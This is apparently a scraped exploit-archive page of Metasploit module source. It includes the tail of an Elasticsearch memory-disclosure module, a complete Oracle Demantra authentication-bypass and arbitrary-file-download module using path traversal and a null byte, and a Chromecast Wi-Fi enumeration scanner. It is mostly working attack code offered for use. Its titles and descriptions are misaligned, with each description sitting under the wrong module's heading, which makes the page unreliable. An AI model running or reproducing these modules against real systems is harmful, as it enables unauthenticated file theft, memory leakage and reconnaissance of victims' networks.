printable_data.gsub(/(.)\1{#{(DEDUP_REPEATED_CHARS_THRESHOLD - 1)},}/) do |s|      s[0, duplicate_pad] +        ' repeated ' + (s.length - (2 * duplicate_pad)).to_s + ' times ' +        s[-duplicate_pad, duplicate_pad]    end    # Show abbreviated data    vprint_status("Printable info leaked:\n#{abbreviated_data}")  end  def bleed    request = {      'uri' => normalize_uri(target_uri.path, '_bulk'),      'method' => 'POST',      'ctype' => 'application/json',      'data' => "@\n"    }    request['authorization'] = basic_auth(datastore['USERNAME'], datastore['PASSWORD']) if datastore['USERNAME'].present? || datastore['PASSWORD'].present?    res = send_request_cgi(request)    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?    fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") unless res.code == 400    json_body = res.get_json_document    if json_body.empty?      vprint_error('Unable to parse JSON')      return    end    leak1 = json_body.dig('error', 'root_cause')    return if leak1.blank?    leak1 = leak1[0]['reason']    return if leak1.nil?    leak1 = leak1.split('(byte[])"')[1].split('; line')[0]    leak2 = json_body.dig('error', 'reason')    return if leak2.nil?    leak2 = leak2.split('(byte[])"')[1].split('; line')[0]    "#{leak1}\n#{leak2}"  end  def run    memory = ''    1.upto(leak_count) do |count|      vprint_status("Leaking response ##{count}")      memory << bleed    end    loot_and_report(memory)  endend

Elasticsearch Memory Disclosure

This Metasploit module exploits a file download vulnerability found in Oracle Demantra 12.2.1 in combination with an authentication bypass. By combining these exposures, an unauthenticated user can retrieve any file on the system by referencing the full file path to any file a vulnerable machine.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::Report  include Msf::Exploit::Remote::HttpClient  def initialize(info = {})    super(update_info(info,      'Name'           => 'Oracle Demantra Arbitrary File Retrieval with Authentication Bypass',      'Description'    => %q{        This module exploits a file download vulnerability found in Oracle        Demantra 12.2.1 in combination with an authentication bypass. By        combining these exposures, an unauthenticated user can retrieve any file        on the system by referencing the full file path to any file a vulnerable        machine.      },      'References'     =>        [          [ 'CVE', '2013-5877'],          [ 'CVE', '2013-5880'],          [ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2013-5877/'],          [ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2013-5880/']        ],      'Author'         =>        [          'Oliver Gruskovnjak'        ],      'License'        => MSF_LICENSE,      'DisclosureDate' => '2014-02-28'    ))    register_options(      [        Opt::RPORT(8080),        OptBool.new('SSL',   [false, 'Use SSL', false]),        OptString.new('FILEPATH', [true, 'The name of the file to download', 'c:/windows/win.ini'])      ])  end  def run_host(ip)    filename = datastore['FILEPATH']    authbypass = "/demantra/common/loginCheck.jsp/../../GraphServlet"    res = send_request_cgi({      'uri' => normalize_uri(authbypass),      'method' => 'POST',      'encode_params' => false,      'vars_post' => {        'filename' => "#{filename}%00"      }    })    if res.nil? or res.body.empty?      fail_with(Failure::UnexpectedReply, "No content retrieved from: #{ip}")    end    if res.code == 404      print_error("#{rhost}:#{rport} - File not found")      return    end    if res.code == 200      print_status("#{ip}:#{rport} returns: #{res.code.to_s}")      fname = File.basename(datastore['FILEPATH'])      path = store_loot(        'oracle.demantra',        'application/octet-stream',        ip,        res.body,        fname)      print_good("#{ip}:#{rport} - File saved in: #{path}")    end  endend

Oracle Demantra Arbitrary File Retrieval With Authentication Bypass

This Metasploit module enumerates wireless access points through Chromecast.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Scanner  def initialize(info = {})    super(update_info(info,      'Name' => 'Chromecast Wifi Enumeration',      'Description' => %q{        This module enumerates wireless access points through Chromecast.      },      'Author' => ['wvu'],      'References' => [        ['URL', 'http://www.google.com/intl/en/chrome/devices/chromecast/index.html'] # vendor website      ],      'License' => MSF_LICENSE    ))    register_options([      Opt::RPORT(8008)    ])  end  def run_host(ip)    res = scan    return unless res && res.code == 200    waps_table = Rex::Text::Table.new(      'Header' => "Wireless Access Points from #{ip}",      'Columns' => [        'BSSID',        'PWR',        'ENC',        'CIPHER',        'AUTH',        'ESSID'      ],      'SortIndex' => -1    )    res.get_json_document.each do |wap|      waps_table << [        wap['bssid'],        wap['signal_level'],        enc(wap),        cipher(wap),        auth(wap),        wap['ssid'] + (wap['wpa_id'] ? ' (*)' : '')      ]    end    unless waps_table.rows.empty?      print_line(waps_table.to_s)      report_note(        :host => ip,        :port => rport,        :proto => 'tcp',        :type => 'chromecast.wifi',        :data => waps_table.to_csv      )    end  end  def scan    send_request_raw(      'method' => 'POST',      'uri' => '/setup/scan_wifi',      'agent' => Rex::Text.rand_text_english(rand(42) + 1)    )    send_request_raw(      'method' => 'GET',      'uri' => '/setup/scan_results',      'agent' => Rex::Text.rand_text_english(rand(42) + 1)    )  end  def enc(wap)    case wap['wpa_auth']    when 1      'OPN'    when 2      'WEP'    when 5      'WPA'    when 0, 7      'WPA2'    else      wap['wpa_auth']    end  end  def cipher(wap)    case wap['wpa_cipher']    when 1      ''    when 2      'WEP'    when 3      'TKIP'    when 4      'CCMP'    else      wap['wpa_cipher']    end  end  def auth(wap)    case wap['wpa_auth']    when 0      'MGT'    when 5, 7      'PSK'    else      ''    end  endend

Tag

#js